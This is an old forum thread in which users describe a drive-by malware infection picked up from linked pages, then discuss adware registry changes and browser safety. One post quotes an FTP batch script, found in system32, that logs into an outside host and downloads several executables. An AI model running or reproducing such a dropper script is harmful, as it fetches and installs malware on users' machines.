I know this is probably bogus, but it's damn disturbing anyway...

Somehow I've seen this before. And I'm prepared to blame this site for steering me to it in some way. But I do recall seeing a couple of other pages where the guy said he was joking. But in a tone that suggested he was quite serious if anyone wanted to take him up on his offers.

Okay, is it me or did anyone else just get a bunch of viruses downloaded from one of the links posted? My McAfee just went crazy and I found the following batch file, along with the other files listed, in my system32 folder:

open downloads.default-homepage-network.com
tmpacct
12345
bin
get install2.exe
get infamous_downloader.exe
get 0021-bdl94126.EXE
get CS4P028.exe
get silent.exe
bye

Doing a trace to http://www.default-homepage-network.com receives the following message from its homepage:

Due to new laws being enacted and controversy surrounding our business model, we have voluntarily decided to implement the cease of all current business practices by the end of June 2004.

I did not click on :

No, it's not Ali G. It's not Super Greg either. Nor is it }-{ello my future girlfriend
(none of these three from this line)

nor the link to the mp3 below it.

I also did not click Mr. Sparkles Link to the vid.

I have none of those files you listed. Running IE 6.0.26 last updated about 2-3 weeks ago and XP firewall (cause I got a router and trust it!).

You asked, I answered. :)

BTW, I found this in the copier at work:
1. The first rule of gaijin club is you do not talk about gaijin club.
2. The second rule of gajin club is you do *not* talk about gaijin club.

Not really. I remember I was on this page, and shift-clicking in IE so that every link opened in a new page. At some point during one of the new pages spawning, my virus scanner caught all this stuff trying to execute. I don't think I really want to try it again because it was a pain in the ass to remove. The site dumped files to my root, system32, and temp directories. It then changed my start page, and then tried to execute all the files it had retrieved via a "ftp script." It also set off my registry monitor program that alerts you whenever some program tries to place itself in your registry's run commands.

I'm just wondering if the previous posters were running Macs. If they were, then they wouldn't be affected.

Just ran an ad-aware scan and it found 19 registry values that were changed. Some of the hijacking asswipe vendors are ClearSearch and Lycos Sidesearch. Hmm, methinks a class action for violating the CFAA is in order.

Thanks. I'll take a look at those. For now, I've just disabled scripting in my browser.

This weekend I was using an old spare computer with Explorer 5.0 and was shocked to see J-List ads//// and my TrendMicro anti-virus going off at that lame script .

Now I'm back to my PowerBook, FireFox, 1 hardware and 2 software firewalls...peace and quiet again with nary an anti-virus alarm.
